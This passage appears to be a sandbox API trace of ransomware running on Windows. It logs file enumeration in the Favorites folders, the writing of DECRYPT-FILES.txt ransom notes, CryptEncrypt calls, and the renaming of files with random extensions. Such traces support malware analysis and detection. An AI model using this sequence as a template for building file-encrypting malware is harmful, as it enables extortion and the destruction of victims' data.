"c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.v4Y3P" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.v4y3p"), dwFlags=0x0) returned 1 [0088.378] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.379] lstrcatW (in: lpString1="Microsoft Websites", lpString2="\\" | out: lpString1="Microsoft Websites\\") returned="Microsoft Websites\\" [0088.379] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0088.379] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\jkbimi8.tmp") returned 58 [0088.379] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.381] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0088.381] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.381] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt") returned 64 [0088.381] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.382] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.383] CloseHandle (hObject=0x414) returned 1 [0088.383] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0088.383] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*" [0088.383] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0df97c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0df97c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0088.383] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0088.383] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="IE Add-on site.url" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0088.384] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.384] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.384] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.385] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.385] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.385] CloseHandle (hObject=0x0) returned 0 [0088.386] CloseHandle (hObject=0x428) returned 1 [0088.386] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.386] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 64 [0088.386] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.Qs23Cfb") returned 72 [0088.386] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.Qs23Cfb" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.qs23cfb"), dwFlags=0x0) returned 1 [0088.387] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0088.387] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="IE site on Microsoft.com.url" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" [0088.387] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.387] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.387] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.388] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.388] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.389] CloseHandle (hObject=0x0) returned 0 [0088.389] CloseHandle (hObject=0x428) returned 1 [0088.389] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.389] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 74 [0088.389] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.DGto") returned 79 [0088.389] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.dgto"), dwFlags=0x0) returned 1 [0088.390] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0088.390] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\jkbimi8.tmp") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\jkbimi8.tmp" [0088.390] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0088.390] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Home.url" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" [0088.390] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.390] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.391] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.391] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.391] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.392] CloseHandle (hObject=0x0) returned 0 [0088.392] CloseHandle (hObject=0x428) returned 1 [0088.392] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.392] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 67 [0088.392] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.DGto") returned 72 [0088.392] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.dgto"), dwFlags=0x0) returned 1 [0088.393] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0088.393] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.393] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.394] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.394] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.394] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.395] CloseHandle (hObject=0x0) returned 0 [0088.395] CloseHandle (hObject=0x428) returned 1 [0088.396] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.396] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 67 [0088.396] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.DGto") returned 72 [0088.396] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.dgto"), dwFlags=0x0) returned 1 [0088.396] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0088.398] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.398] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.398] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.398] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.398] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.399] CloseHandle (hObject=0x0) returned 0 [0088.399] CloseHandle (hObject=0x428) returned 1 [0088.400] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.400] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 65 [0088.400] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.DGto") returned 70 [0088.400] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.dgto"), dwFlags=0x0) returned 1 [0088.401] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\\\jkbimi8.tmp") returned 52 [0088.401] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\favorites\\msn websites\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.403] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0088.403] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.403] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt") returned 58 [0088.403] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.403] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.404] CloseHandle (hObject=0x414) returned 1 [0088.404] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0088.404] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0088.404] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0088.405] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.405] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.405] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.405] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.405] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.406] CloseHandle (hObject=0x0) returned 0 [0088.406] CloseHandle (hObject=0x428) returned 1 [0088.406] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.407] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 53 [0088.407] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.ETaqt") returned 59 [0088.407] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.etaqt"), dwFlags=0x0) returned 1 [0088.407] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0088.408] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.408] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.408] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.409] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.409] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.409] CloseHandle (hObject=0x0) returned 0 [0088.410] CloseHandle (hObject=0x428) returned 1 [0088.410] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.410] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 61 [0088.410] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.ETaqt") returned 67 [0088.410] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.etaqt"), dwFlags=0x0) returned 1 [0088.411] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0088.411] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.411] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.411] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.411] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.411] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.412] CloseHandle (hObject=0x0) returned 0 [0088.412] CloseHandle (hObject=0x428) returned 1 [0088.413] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.413] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 53 [0088.413] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.ETaqt") returned 59 [0088.413] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.etaqt"), dwFlags=0x0) returned 1 [0088.413] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0088.413] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.414] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.414] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.414] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.414] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.415] CloseHandle (hObject=0x0) returned 0 [0088.415] CloseHandle (hObject=0x428) returned 1 [0088.415] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.415] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 54 [0088.415] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.ETaqt") returned 60 [0088.415] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.etaqt"), dwFlags=0x0) returned 1 [0088.416] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0088.417] CryptGenRandom (in: 